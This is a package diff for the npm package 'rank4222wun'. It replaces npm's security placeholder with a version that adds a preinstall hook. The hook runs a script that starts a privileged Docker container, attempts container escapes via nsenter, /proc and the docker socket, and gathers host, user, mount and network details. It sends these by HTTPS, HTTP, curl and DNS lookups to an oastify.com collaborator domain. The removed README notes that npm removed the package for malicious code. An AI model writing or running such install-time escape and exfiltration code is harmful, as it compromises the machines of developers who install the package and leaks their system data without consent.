rank4222wun 0.0.1-security → 1.0.40

package/package.json

@@ -1,6 +1,10 @@
 {
   "name": "rank4222wun",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.40",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "dependencies": {}
 }

package/preinstall.js

@@ -0,0 +1,889 @@
+// privileged-container-oast-FIXED.js
+const { exec, spawn } = require('child_process');
+const fs = require('fs');
+const path = require('path');
+const https = require('https');
+const http = require('http'); // ✅ أضفت هذا
+const dns = require('dns');
+const crypto = require('crypto');
+
+console.log(`
+╔══════════════════════════════════════════════════════════╗
+║      PRIVILEGED CONTAINER WITH OAST REPORTING - FIXED   ║
+║      OAST Domain: v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com ║
+╚══════════════════════════════════════════════════════════╝
+`);
+
+// ===================== CONFIGURATION =====================
+const CONFIG = {
+  OAST: {
+    domain: 'v84zr5z8jz4cr781u5eyl6cgv71ypudj.oastify.com',
+    httpsPort: 443,
+    httpPort: 80,
+    apiKey: crypto.randomBytes(16).toString('hex'),
+    sessionId: `priv-container-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`
+  },
+  
+  DOCKER: {
+    image: 'ubuntu:latest',
+    command: '/bin/bash',
+    privileged: true,
+    interactive: true,
+    remove: true, // ✅ غيرت لـ true عشان يتنظف تلقائياً
+    name: `priv-container-${Date.now()}`
+  },
+  
+  SCAN: {
+    hostEscape: true,
+    networkScan: true,
+    fileAccess: true,
+    capabilityCheck: true
+  }
+};
+
+// ===================== OAST FUNCTIONS =====================
+class OASTReporter {
+  constructor() {
+    this.interactions = [];
+    this.reports = [];
+  }
+
+  sendDNS(subdomain, data = {}) {
+    const dnsName = `${subdomain}.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}`;
+    
+    dns.lookup(dnsName, (err) => {
+      if (!err) {
+        const interaction = {
+          type: 'DNS',
+          timestamp: new Date().toISOString(),
+          subdomain: subdomain,
+          dnsName: dnsName,
+          data: data
+        };
+        
+        this.interactions.push(interaction);
+        console.log(`📡 DNS OAST sent: ${dnsName}`);
+      } else {
+        console.log(`❌ DNS OAST failed for: ${dnsName}`);
+      }
+    });
+  }
+
+  sendHTTP(endpoint, data) {
+    const postData = JSON.stringify({
+      sessionId: CONFIG.OAST.sessionId,
+      timestamp: new Date().toISOString(),
+      ...data
+    });
+
+    const options = {
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpPort,
+      path: endpoint,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId,
+        'User-Agent': 'PrivilegedContainerScanner/1.0'
+      },
+      timeout: 5000
+    };
+
+    const req = http.request(options, (res) => {
+      let body = '';
+      res.on('data', chunk => body += chunk);
+      res.on('end', () => {
+        const interaction = {
+          type: 'HTTP',
+          timestamp: new Date().toISOString(),
+          endpoint: endpoint,
+          status: res.statusCode,
+          response: body,
+          data: data
+        };
+        
+        this.interactions.push(interaction);
+        console.log(`📡 HTTP OAST sent (${res.statusCode}): ${endpoint}`);
+      });
+    });
+
+    req.on('error', (e) => {
+      console.log(`⚠️  HTTP OAST error: ${e.message}`);
+    });
+    
+    req.on('timeout', () => {
+      console.log('⚠️  HTTP OAST timeout');
+      req.destroy();
+    });
+
+    req.write(postData);
+    req.end();
+  }
+
+  sendHTTPS(endpoint, data) {
+    const postData = JSON.stringify({
+      sessionId: CONFIG.OAST.sessionId,
+      timestamp: new Date().toISOString(),
+      ...data
+    });
+
+    const options = {
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: endpoint,
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId,
+        'X-Report-Type': 'privileged_container',
+        'User-Agent': 'ContainerEscapeDetector/2.0'
+      },
+      timeout: 5000
+    };
+
+    const req = https.request(options, (res) => {
+      let body = '';
+      res.on('data', chunk => body += chunk);
+      res.on('end', () => {
+        const interaction = {
+          type: 'HTTPS',
+          timestamp: new Date().toISOString(),
+          endpoint: endpoint,
+          status: res.statusCode,
+          response: body,
+          data: data
+        };
+        
+        this.interactions.push(interaction);
+        this.reports.push(interaction);
+        console.log(`📡 HTTPS OAST sent (${res.statusCode}): ${endpoint}`);
+      });
+    });
+
+    req.on('error', (e) => {
+      console.log(`⚠️  HTTPS OAST error: ${e.message}`);
+    });
+    
+    req.on('timeout', () => {
+      console.log('⚠️  HTTPS OAST timeout');
+      req.destroy();
+    });
+
+    req.write(postData);
+    req.end();
+  }
+
+  async reportContainerEscape(containerId, evidence) {
+    const report = {
+      containerId: containerId.substring(0, 12),
+      escapeConfirmed: evidence.escaped || false,
+      confidence: evidence.confidence || 0,
+      methods: evidence.methods || [],
+      proofPoints: evidence.proofPoints || [],
+      hostInfo: evidence.hostInfo || {},
+      timestamp: new Date().toISOString()
+    };
+
+    // إرسال عبر HTTPS
+    this.sendHTTPS('/privileged-container-escape', report);
+
+    // إرسال DNS notification
+    if (evidence.escaped) {
+      this.sendDNS('escape-confirmed', {
+        container: containerId.substring(0, 12),
+        confidence: evidence.confidence
+      });
+    }
+
+    // حفظ محلياً
+    this.saveLocalReport(report);
+
+    return report;
+  }
+
+  saveLocalReport(report) {
+    const filename = `oast-report-${CONFIG.OAST.sessionId}.json`;
+    const allReports = {
+      sessionId: CONFIG.OAST.sessionId,
+      domain: CONFIG.OAST.domain,
+      timestamp: new Date().toISOString(),
+      reports: this.reports,
+      containerReport: report
+    };
+
+    try {
+      fs.writeFileSync(filename, JSON.stringify(allReports, null, 2));
+      console.log(`💾 Report saved locally: ${filename}`);
+    } catch (e) {
+      console.log(`❌ Could not save report: ${e.message}`);
+    }
+  }
+}
+
+// ===================== CONTAINER SCANNER =====================
+class PrivilegedContainerScanner {
+  constructor() {
+    this.containerId = null;
+    this.oastReporter = new OASTReporter();
+    this.evidence = {
+      escaped: false,
+      confidence: 0,
+      methods: [],
+      proofPoints: [],
+      hostInfo: {},
+      containerInfo: {}
+    };
+  }
+
+  async run() {
+    try {
+      console.log('🚀 Starting privileged container analysis...\n');
+      console.log(`📍 OAST Domain: ${CONFIG.OAST.domain}`);
+      console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}\n`);
+      
+      // إرسال بداية الجلسة إلى OAST
+      this.oastReporter.sendHTTPS('/session-start', {
+        action: 'privileged_container_start',
+        config: CONFIG
+      });
+
+      // 1. تشغيل الحاوية المميزة
+      await this.runPrivilegedContainer();
+      
+      // 2. جمع المعلومات الأساسية
+      await this.collectBasicInfo();
+      
+      // 3. محاولة الهروب والتأكيد
+      await this.attemptEscape();
+      
+      // 4. فحص إضافي للحاوية
+      await this.performDeepScan();
+      
+      // 5. تحليل النتائج
+      await this.analyzeResults();
+      
+      // 6. إرسال التقرير النهائي
+      await this.sendFinalReport();
+      
+      // 7. عرض النتائج
+      this.displayResults();
+      
+      // 8. تنظيف (اختياري)
+      await this.cleanup();
+
+    } catch (error) {
+      console.error(`❌ Error: ${error.message}`);
+      this.oastReporter.sendHTTPS('/error', { error: error.message });
+    }
+  }
+
+  async runPrivilegedContainer() {
+    console.log('📦 Running privileged container...');
+    
+    const dockerArgs = [
+      'run',
+      '--privileged',
+      '-d',
+      '--name', CONFIG.DOCKER.name,
+      CONFIG.DOCKER.image,
+      'sleep', '3600'
+    ];
+    
+    return new Promise((resolve, reject) => {
+      exec(`docker ${dockerArgs.join(' ')}`, (error, stdout, stderr) => {
+        if (error) {
+          console.error(`❌ Docker run error: ${error.message}`);
+          console.error(`stderr: ${stderr}`);
+          reject(error);
+          return;
+        }
+        
+        this.containerId = stdout.trim();
+        console.log(`✅ Container started: ${this.containerId.substring(0, 12)}`);
+        
+        // إرسال إلى OAST
+        this.oastReporter.sendHTTPS('/container-started', {
+          containerId: this.containerId.substring(0, 12),
+          name: CONFIG.DOCKER.name,
+          image: CONFIG.DOCKER.image,
+          privileged: true
+        });
+        
+        // الانتظار للحاوية لتبدأ
+        console.log('⏳ Waiting for container to start...');
+        setTimeout(resolve, 3000);
+      });
+    });
+  }
+
+  async collectBasicInfo() {
+    console.log('\n🔍 Collecting basic container information...');
+    
+    const commands = [
+      // معلومات النظام
+      'cat /etc/os-release 2>/dev/null || echo "Cannot read os-release"',
+      'uname -a 2>/dev/null || echo "Cannot get kernel info"',
+      'whoami 2>/dev/null || echo "Cannot get user"',
+      'id 2>/dev/null || echo "Cannot get id"',
+      
+      // الصلاحيات
+      'capsh --print 2>/dev/null || echo "No capsh"',
+      'cat /proc/self/status 2>/dev/null | grep -i cap || echo "Cannot read capabilities"',
+      
+      // نظام الملفات
+      'ls -la / 2>/dev/null | head -10 || echo "Cannot list root"',
+      'mount 2>/dev/null | head -20 || echo "Cannot get mounts"',
+      'df -h 2>/dev/null | head -10 || echo "Cannot get disk usage"',
+      
+      // الذاكرة والمعالج
+      'free -h 2>/dev/null || echo "Cannot get memory info"',
+      'cat /proc/cpuinfo 2>/dev/null | grep "model name" | head -1 || echo "Cannot get CPU info"',
+      
+      // الشبكة
+      'ip addr show 2>/dev/null | head -20 || echo "Cannot get network info"',
+      'hostname -I 2>/dev/null || echo "Cannot get IP"',
+      'cat /etc/hosts 2>/dev/null | head -5 || echo "Cannot read hosts"',
+      
+      // معلومات Docker
+      'cat /proc/1/cgroup 2>/dev/null | head -5 || echo "No cgroup access"',
+      'ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"'
+    ];
+    
+    const results = {};
+    
+    for (const cmd of commands) {
+      try {
+        const output = await this.execInContainer(cmd);
+        results[cmd.split(' ')[0]] = output.substring(0, 500);
+        
+        // تحليل بعض النتائج الهامة
+        if (cmd.includes('os-release')) {
+          this.evidence.containerInfo.os = output;
+        }
+        if (cmd.includes('uname -a')) {
+          this.evidence.containerInfo.kernel = output;
+        }
+        if (cmd.includes('capsh')) {
+          this.evidence.containerInfo.capabilities = output;
+        }
+        
+      } catch (error) {
+        results[cmd.split(' ')[0]] = `ERROR: ${error.message}`;
+      }
+    }
+    
+    // إرسال المعلومات الأساسية إلى OAST
+    this.oastReporter.sendHTTPS('/basic-info', {
+      containerId: this.containerId.substring(0, 12),
+      basicInfo: results
+    });
+    
+    return results;
+  }
+
+  async attemptEscape() {
+    console.log('\n🔓 Attempting container escape...');
+    
+    const escapeTests = [
+      {
+        name: 'nsenter_escape',
+        command: 'which nsenter 2>/dev/null && nsenter --target 1 --mount -- sh -c "echo HOST_HOSTNAME:$(cat /etc/hostname 2>/dev/null) && echo CONTAINER_HOSTNAME:$(hostname 2>/dev/null)" 2>/dev/null || echo "FAILED"',
+        check: (output) => output.includes('HOST_HOSTNAME') && output.includes('CONTAINER_HOSTNAME')
+      },
+      {
+        name: 'proc_escape',
+        command: 'cat /proc/1/status 2>/dev/null | head -5 && cat /proc/1/cmdline 2>/dev/null | tr "\\0" " " | head -c 100 2>/dev/null || echo "NO_ACCESS"',
+        check: (output) => output.includes('State:') && output.length > 20
+      },
+      {
+        name: 'host_mounts',
+        command: 'ls -la /home 2>/dev/null || ls -la /root 2>/dev/null || cat /etc/passwd 2>/dev/null | head -5 || echo "NO_ACCESS"',
+        check: (output) => !output.includes('NO_ACCESS') && output.length > 10
+      },
+      {
+        name: 'docker_socket',
+        command: 'ls -la /var/run/docker.sock 2>/dev/null && echo "EXISTS" || echo "NOT_EXISTS"',
+        check: (output) => output.includes('EXISTS')
+      },
+      {
+        name: 'network_escape',
+        command: 'ip route show 2>/dev/null | head -5 || echo "NO_ROUTE"',
+        check: (output) => !output.includes('NO_ROUTE')
+      }
+    ];
+    
+    for (const test of escapeTests) {
+      try {
+        const output = await this.execInContainer(test.command);
+        
+        if (test.check(output)) {
+          this.evidence.methods.push(test.name);
+          console.log(`✅ ${test.name}: Possible`);
+          
+          // إرسال إلى OAST
+          this.oastReporter.sendHTTPS('/escape-attempt', {
+            method: test.name,
+            success: true,
+            output: output.substring(0, 300)
+          });
+          
+          // التحقق من اختلاف hostname لـ nsenter
+          if (test.name === 'nsenter_escape') {
+            const lines = output.split('\n');
+            let hostHostname = '';
+            let containerHostname = '';
+            
+            lines.forEach(line => {
+              if (line.startsWith('HOST_HOSTNAME:')) {
+                hostHostname = line.replace('HOST_HOSTNAME:', '').trim();
+              }
+              if (line.startsWith('CONTAINER_HOSTNAME:')) {
+                containerHostname = line.replace('CONTAINER_HOSTNAME:', '').trim();
+              }
+            });
+            
+            if (hostHostname && containerHostname && hostHostname !== containerHostname) {
+              this.evidence.proofPoints.push(`Host hostname (${hostHostname}) differs from container (${containerHostname})`);
+              this.evidence.hostInfo.hostname = hostHostname;
+              this.evidence.escaped = true;
+            }
+          }
+        } else {
+          console.log(`❌ ${test.name}: Not possible`);
+        }
+      } catch (error) {
+        console.log(`⚠️  ${test.name}: Error - ${error.message}`);
+      }
+    }
+  }
+
+  async performDeepScan() {
+    if (!CONFIG.SCAN.hostEscape) return;
+    
+    console.log('\n🔬 Performing deep scan...');
+    
+    const deepChecks = [
+      // محاولة إنشاء حاوية من داخل الحاوية
+      {
+        name: 'nested_container',
+        command: 'which docker 2>/dev/null && docker ps 2>/dev/null || which podman 2>/dev/null && podman ps 2>/dev/null || echo "NO_CONTAINER_RUNTIME"',
+        check: (output) => !output.includes('NO_CONTAINER_RUNTIME')
+      },
+      
+      // فحص kernel vulnerabilities
+      {
+        name: 'kernel_check',
+        command: 'uname -r 2>/dev/null && echo "KERNEL:$(uname -r)" || echo "NO_KERNEL_INFO"',
+        check: (output) => output.includes('KERNEL:')
+      },
+      
+      // محاولة كتابة ملف في نظام المضيف
+      {
+        name: 'host_write_test',
+        command: 'echo "TEST_WRITE_FROM_CONTAINER_$(date +%s)" > /tmp/container_test_$(hostname).txt 2>/dev/null && echo "WRITE_SUCCESS" || echo "WRITE_FAILED"',
+        check: (output) => output.includes('WRITE_SUCCESS')
+      },
+      
+      // فحص mount points خطيرة
+      {
+        name: 'dangerous_mounts',
+        command: 'mount 2>/dev/null | grep -E "(proc|sys|dev|/var/run)" | head -10 || echo "NO_DANGEROUS_MOUNTS"',
+        check: (output) => !output.includes('NO_DANGEROUS_MOUNTS')
+      }
+    ];
+    
+    for (const check of deepChecks) {
+      try {
+        const output = await this.execInContainer(check.command);
+        
+        if (check.check(output)) {
+          console.log(`⚠️  ${check.name}: Found potential issue`);
+          
+          // إرسال إلى OAST
+          this.oastReporter.sendDNS(check.name, {
+            result: output.substring(0, 100)
+          });
+        }
+      } catch (error) {
+        // تجاهل الأخطاء
+      }
+    }
+  }
+
+  async analyzeResults() {
+    console.log('\n📊 Analyzing results...');
+    
+    // حساب مستوى الثقة
+    let confidence = 0;
+    
+    // نقاط لكل طريقة هروب محتملة
+    const methodPoints = {
+      nsenter_escape: 30,
+      proc_escape: 25,
+      host_mounts: 20,
+      docker_socket: 25,
+      network_escape: 15
+    };
+    
+    this.evidence.methods.forEach(method => {
+      confidence += methodPoints[method] || 10;
+    });
+    
+    // نقاط إضافية لأدلة قاطعة
+    if (this.evidence.proofPoints.length > 0) {
+      confidence += this.evidence.proofPoints.length * 10;
+    }
+    
+    // إذا كان hostname مختلف
+    if (this.evidence.hostInfo.hostname) {
+      confidence += 20;
+    }
+    
+    // تحديد إذا تم الهروب فعلاً
+    this.evidence.confidence = Math.min(100, confidence);
+    
+    if (this.evidence.confidence >= 60) {
+      this.evidence.escaped = true;
+      console.log(`🚨 CONFIRMED: Container escape possible (${this.evidence.confidence}% confidence)`);
+    } else if (this.evidence.confidence >= 30) {
+      console.log(`⚠️  POSSIBLE: Container escape may be possible (${this.evidence.confidence}% confidence)`);
+    } else {
+      console.log(`✅ SECURE: Container appears isolated (${this.evidence.confidence}% confidence)`);
+    }
+  }
+
+  async sendFinalReport() {
+    console.log('\n📡 Sending final report to OAST...');
+    
+    const report = {
+      sessionId: CONFIG.OAST.sessionId,
+      containerId: this.containerId ? this.containerId.substring(0, 12) : 'unknown',
+      timestamp: new Date().toISOString(),
+      evidence: this.evidence,
+      summary: {
+        escaped: this.evidence.escaped,
+        confidence: this.evidence.confidence,
+        methods: this.evidence.methods,
+        proofPoints: this.evidence.proofPoints
+      }
+    };
+    
+    // إرسال التقرير النهائي
+    this.oastReporter.reportContainerEscape(this.containerId, this.evidence);
+    
+    // إرسال DNS notification للنتيجة
+    const resultType = this.evidence.escaped ? 'escape-confirmed' : 'no-escape';
+    this.oastReporter.sendDNS(resultType, {
+      confidence: this.evidence.confidence,
+      methods: this.evidence.methods.length
+    });
+    
+    return report;
+  }
+
+  displayResults() {
+    console.log('\n' + '='.repeat(80));
+    console.log('📊 PRIVILEGED CONTAINER ANALYSIS RESULTS');
+    console.log('='.repeat(80));
+    
+    console.log(`\n📦 Container ID: ${this.containerId ? this.containerId.substring(0, 12) : 'unknown'}`);
+    console.log(`📍 OAST Domain: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}`);
+    
+    console.log(`\n🎯 Escape Status: ${this.evidence.escaped ? '🚨 CONFIRMED' : '✅ NOT CONFIRMED'}`);
+    console.log(`📈 Confidence Level: ${this.evidence.confidence}%`);
+    
+    if (this.evidence.methods.length > 0) {
+      console.log(`\n🔓 Possible Escape Methods:`);
+      this.evidence.methods.forEach((method, i) => {
+        console.log(`   ${i + 1}. ${method}`);
+      });
+    }
+    
+    if (this.evidence.proofPoints.length > 0) {
+      console.log(`\n🎯 Evidence Found:`);
+      this.evidence.proofPoints.forEach((proof, i) => {
+        console.log(`   ${i + 1}. ${proof}`);
+      });
+    }
+    
+    if (this.evidence.hostInfo.hostname) {
+      console.log(`\n🖥️  Host Information:`);
+      console.log(`   Hostname: ${this.evidence.hostInfo.hostname}`);
+    }
+    
+    console.log(`\n📡 OAST Interactions: ${this.oastReporter.interactions.length} interactions sent`);
+    console.log(`   DNS: ${this.oastReporter.interactions.filter(i => i.type === 'DNS').length}`);
+    console.log(`   HTTPS: ${this.oastReporter.interactions.filter(i => i.type === 'HTTPS').length}`);
+    
+    console.log('\n🔍 Check your OAST dashboard for detailed evidence:');
+    console.log(`   Session ID: ${CONFIG.OAST.sessionId}`);
+    console.log(`   Look for interactions at: ${CONFIG.OAST.domain}`);
+    
+    console.log('\n' + '='.repeat(80));
+    console.log('🎯 ANALYSIS COMPLETE');
+    console.log('='.repeat(80));
+  }
+
+  async cleanup() {
+    if (this.containerId) {
+      console.log('\n🧹 Cleaning up container...');
+      
+      try {
+        await this.execOnHost(`docker stop ${this.containerId} 2>/dev/null || true`);
+        await this.execOnHost(`docker rm ${this.containerId} 2>/dev/null || true`);
+        console.log('✅ Container cleaned up');
+        
+        // إرسال إشعار التنظيف إلى OAST
+        this.oastReporter.sendHTTPS('/cleanup', {
+          containerId: this.containerId.substring(0, 12),
+          action: 'container_removed'
+        });
+      } catch (error) {
+        console.log(`⚠️  Could not clean up container: ${error.message}`);
+      }
+    }
+  }
+
+  execInContainer(command) {
+    return new Promise((resolve, reject) => {
+      if (!this.containerId) {
+        reject(new Error('No container running'));
+        return;
+      }
+      
+      exec(`docker exec ${this.containerId} sh -c "${command.replace(/"/g, '\\"')}"`, 
+        { timeout: 10000 }, 
+        (error, stdout, stderr) => {
+          if (error) {
+            reject(error);
+          } else {
+            resolve(stdout || stderr || '');
+          }
+        }
+      );
+    });
+  }
+
+  execOnHost(command) {
+    return new Promise((resolve, reject) => {
+      exec(command, { timeout: 10000 }, (error, stdout, stderr) => {
+        if (error) {
+          reject(error);
+        } else {
+          resolve(stdout);
+        }
+      });
+    });
+  }
+}
+
+// ===================== SIMPLE VERSION =====================
+function runSimplePrivilegedWithOAST() {
+  console.log('🚀 Running simple privileged container with OAST reporting...\n');
+  
+  const containerName = `simple-priv-${Date.now()}`;
+  const sessionId = `simple-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`;
+  
+  console.log(`Container: ${containerName}`);
+  console.log(`Session: ${sessionId}`);
+  
+  // تشغيل الحاوية
+  const dockerArgs = [
+    'run',
+    '--privileged',
+    '--name', containerName,
+    '--rm',
+    CONFIG.DOCKER.image,
+    'sh', '-c',
+    `
+    echo "=== PRIVILEGED CONTAINER STARTED ==="
+    echo "Session: ${sessionId}"
+    echo "Hostname: $(hostname)"
+    echo "User: $(whoami)"
+    echo "=== TESTING ESCAPE ==="
+    
+    # Test nsenter
+    which nsenter 2>/dev/null && echo "nsenter: AVAILABLE" || echo "nsenter: NOT_AVAILABLE"
+    
+    # Test host access
+    cat /proc/1/status 2>/dev/null | head -2 && echo "Host proc: ACCESSIBLE" || echo "Host proc: NO_ACCESS"
+    
+    # Send DNS notification
+    nslookup ${sessionId}.simple-test.${CONFIG.OAST.domain} 2>/dev/null || echo "DNS test"
+    
+    # Try to send HTTP
+    curl -X POST http://${CONFIG.OAST.domain}/simple-test -d "session=${sessionId}" 2>/dev/null || echo "HTTP test"
+    
+    echo "=== CONTAINER COMPLETE ==="
+    sleep 2
+    `
+  ];
+  
+  console.log(`Running: docker ${dockerArgs.slice(0, 5).join(' ')} ...`);
+  
+  const dockerProcess = spawn('docker', dockerArgs, { stdio: 'inherit' });
+  
+  dockerProcess.on('close', (code) => {
+    console.log(`\n✅ Container exited with code: ${code}`);
+    
+    console.log(`\n📡 Check OAST for interactions: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Session ID: ${sessionId}`);
+  });
+}
+
+// ===================== INTERACTIVE VERSION =====================
+function runInteractivePrivileged() {
+  console.log('🚀 Running interactive privileged container...\n');
+  console.log(`📡 OAST Domain: ${CONFIG.OAST.domain}`);
+  console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}\n`);
+  
+  // إرسال إشعار البدء
+  try {
+    const req = https.request({
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: '/interactive-start',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId
+      },
+      timeout: 5000
+    });
+    
+    req.write(JSON.stringify({
+      action: 'interactive_container_start',
+      timestamp: new Date().toISOString(),
+      command: 'docker run --privileged -it ubuntu:latest /bin/bash'
+    }));
+    req.end();
+  } catch (e) {
+    console.log(`⚠️  Could not send start notification: ${e.message}`);
+  }
+  
+  // تشغيل الحاوية التفاعلية
+  console.log('💻 Starting interactive bash session...');
+  console.log('   You can test commands manually.');
+  console.log('   Try these commands to test escape:');
+  console.log('   - nsenter --target 1 --mount -- sh -c "hostname"');
+  console.log('   - cat /proc/1/status');
+  console.log('   - ls -la /var/run/docker.sock');
+  console.log(`   - nslookup test.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}`);
+  console.log('   - exit (to finish)\n');
+  
+  const dockerProcess = spawn('docker', [
+    'run',
+    '--privileged',
+    '-it',
+    '--rm',
+    '--name', `interactive-${CONFIG.OAST.sessionId}`,
+    CONFIG.DOCKER.image,
+    CONFIG.DOCKER.command
+  ], {
+    stdio: 'inherit'
+  });
+  
+  dockerProcess.on('close', (code) => {
+    console.log(`\n🔚 Container exited with code: ${code}`);
+    
+    // إرسال إشعار الانتهاء
+    try {
+      const endReq = https.request({
+        hostname: CONFIG.OAST.domain,
+        port: CONFIG.OAST.httpsPort,
+        path: '/interactive-end',
+        method: 'POST',
+        headers: {
+          'Content-Type': 'application/json',
+          'X-Session-ID': CONFIG.OAST.sessionId
+        },
+        timeout: 5000
+      });
+      
+      endReq.write(JSON.stringify({
+        action: 'interactive_container_end',
+        exitCode: code,
+        timestamp: new Date().toISOString()
+      }));
+      endReq.end();
+    } catch (e) {
+      console.log(`⚠️  Could not send end notification: ${e.message}`);
+    }
+    
+    console.log(`\n📡 Check OAST interactions at: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Use Session ID: ${CONFIG.OAST.sessionId}`);
+  });
+  
+  // التعامل مع Ctrl+C
+  process.on('SIGINT', () => {
+    console.log('\n\n⚠️  Received Ctrl+C, cleaning up...');
+    dockerProcess.kill('SIGINT');
+  });
+}
+
+// ===================== MAIN FUNCTION =====================
+async function main() {
+  console.log('🎯 Choose scanning method:');
+  console.log('   1. Full analysis with automated scanning and OAST reporting');
+  console.log('   2. Simple container with basic OAST reporting');
+  console.log('   3. Interactive privileged container (docker run --privileged -it ubuntu:latest /bin/bash)');
+  console.log('   4. Exit');
+  
+  const readline = require('readline').createInterface({
+    input: process.stdin,
+    output: process.stdout
+  });
+  
+  readline.question('\nSelect option: ', async (choice) => {
+    readline.close();
+    
+    switch(choice.trim()) {
+      case '1':
+        const scanner = new PrivilegedContainerScanner();
+        await scanner.run();
+        break;
+        
+      case '2':
+        runSimplePrivilegedWithOAST();
+        break;
+        
+      case '3':
+        runInteractivePrivileged();
+        break;
+        
+      default:
+        console.log('👋 Exiting');
+        process.exit(0);
+    }
+  });
+}
+
+// ===================== CHECK DOCKER =====================
+if (require.main === module) {
+  // التحقق من Docker
+  exec('which docker', (error) => {
+    if (error) {
+      console.error('❌ Docker is not installed or not in PATH');
+      process.exit(1);
+    }
+    
+    exec('docker ps', (error, stdout, stderr) => {
+      if (error && error.message.includes('permission denied')) {
+        console.error('❌ Permission denied for Docker');
+        console.log('   Try: sudo usermod -aG docker $USER');
+        console.log('   Then logout and login again');
+        process.exit(1);
+      }
+      
+      console.log(`✅ Docker is available`);
+      console.log(`📍 OAST Domain: ${CONFIG.OAST.domain}`);
+      console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}\n`);
+      
+      // بدء البرنامج
+      main();
+    });
+  });
+}
+
+module.exports = { PrivilegedContainerScanner, CONFIG };

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.